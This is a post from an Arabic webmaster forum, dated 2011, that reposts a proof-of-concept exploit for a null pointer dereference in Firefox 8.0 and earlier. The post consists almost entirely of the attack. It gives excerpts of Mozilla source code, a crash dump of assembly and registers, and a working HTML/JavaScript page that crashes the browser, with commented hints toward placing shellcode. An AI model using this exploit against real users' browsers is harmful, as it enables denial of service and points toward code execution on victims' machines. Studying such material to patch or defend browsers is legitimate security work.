الرئيسية  || الأسئلة المتكررة  || المحادثة  || بحث||
  تسجيل الدخول||  التسجيل

قائمة المنتديات » خدمة أصحاب المواقع » أمور منوعة لخدمة اصحاب المواقع

 


إرسال موضوع جديد الرد على الموضوع
الكاتب رسالة
 عنوان المشاركة: ثغرة: [dos] - Firefox 8.0 Null Pointer Dereference P
مشاركةمرسل: 16 نوفمبر 2011 10:31 | مشاركةأظهر مشاركة مفردة 

صورة العضو
مراقب تطويري

اشترك في: 10 مايو 2010 13:51
مشاركات: 550
مكان: الكويت
# Firefox <= 8.0 Null Pointer Dereference PoC exploit
# Author: 0in (Maksymilian Motyl)
# Tested on Firefox 8.0/4.0 on windows and Firefox 7.1 on Linux
# Lets see in code:
# $ cat ./mozilla-release/content/base/src/nsObjectLoadingContent.cpp

NS_IMETHODIMP nsObjectLoadingContent::OnStartRequest(nsIRequest *aRequest,
nsISupports *aContext)
{
if (aRequest != mChannel) { // our Pointer is checked there, mChannel is null. I think maybe some magick in js can help there
return NS_BINDING_ABORTED;
}
AutoNotifier notifier(this, PR_TRUE);

if (!IsSuccessfulRequest(aRequest)) { // go


//----------------------------------------------------------------------------------
PRBool nsObjectLoadingContent::IsSuccessfulRequest(nsIReq uest* aRequest)
{
nsresult status;
nsresult rv = aRequest->GetStatus(&status); // Code execution is here.

// ---------------------------------------------------------------------------------


DUMP:
014E7A28 8B7D 08 MOV EDI,DWORD PTR SS:[EBP+8]
014E7A2B 8B07 MOV EAX,DWORD PTR DS:[EDI] ; access violation when reading 0x00000000
014E7A2D 8D4D FC LEA ECX,DWORD PTR SS:[EBP-4]
014E7A30 51 PUSH ECX
014E7A31 57 PUSH EDI
014E7A32 FF50 14 CALL DWORD PTR DS:[EAX+14]

EAX 0012BFC0
ECX 00080000
EDX 00080000
EBX 03A199E8
ESP 0012BF44
EBP 0012BF54
ESI 03A199C0
EDI 00000000
EIP 014E7A2B xul.014E7A2B

$ cat 2011_powrot_komuny.html
<html>
<body>

<object id="dupa">
<script>
RIINDC=document.getElementById("dupa");
RIINDC.QueryInterface(Components.interfaces.nsIReq uestObserver);
//RIINDC.mchannel=SHELLCODE_ADDR
RIINDC.onStartRequest(null,RIINDC.QueryInterface(C omponents.interfaces.nsISupports));
//RIINDC.onStartRequest(RIINDC.mchannel,DWCJWL.Query Interface(Components.interfaces.nsISupports));

</script>
</body>
</html>

_________________
شرح خطوات حجز استضافة اسلامية مجانية لدينا
http://www.1sa1.net/1sa1/1sa1/1sa1/viewtopic.php?f=2&t=2749
اقتراح جعل الروابط الخارجية NOfollow
http://1sa1.net/1sa1/1sa1/1sa1/viewtopic.php?f=32&t=10476
حماية مجلد admincp بكلمة مرور
http://1sa1.net/1sa1/1sa1/1sa1/viewtopic.php?f=5&t=10084
شرح تركيب تول بار أليسكا
http://1sa1.net/1sa1/1sa1/1sa1/viewtopic.php?f=32&t=9356
شرح تنصيب ويندوز فيستا ألتيميت بالصور
http://1sa1.net/1sa1/1sa1/1sa1/viewtopic.php?f=26&t=10171
شرح وتحميل برنامج Doc2pdf
http://1sa1.net/1sa1/1sa1/1sa1/viewtopic.php?f=26&t=10170
ضبط الترميز آلياً في متصفح فاير فوكس
http://1sa1.net/1sa1/1sa1/1sa1/viewtopic.php?f=26&t=10168
وداعا للفورمات
http://1sa1.net/1sa1/1sa1/1sa1/viewtopic.php?f=26&t=10167


          أعلى  
 
 
إرسال موضوع جديد الرد على الموضوع



المتواجدون الآن

المستخدمون المتصفحون لهذا المنتدى: لا يوجد أعضاء مسجلين متصلين و 0 زائر/زوار


عرض مشاركات سابقة منذ:  مرتبة بواسطة  
اذهب إلى:  

لا تستطيع كتابة مواضيع جديدة في هذا المنتدى
لا تستطيع كتابة ردود في هذا المنتدى
لا تستطيع تعديل مشاركاتك في هذا المنتدى
لا تستطيع حذف مشاركاتك في هذا المنتدى
لا تستطيع إرفاق ملف في هذا المنتدى



قد تضع هنا تبرعا لك عبر البي بال

Valid CSS!



Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
Translated by phpBBArabia
Powered by phpBB-FOX SEO the premodded version of phpBB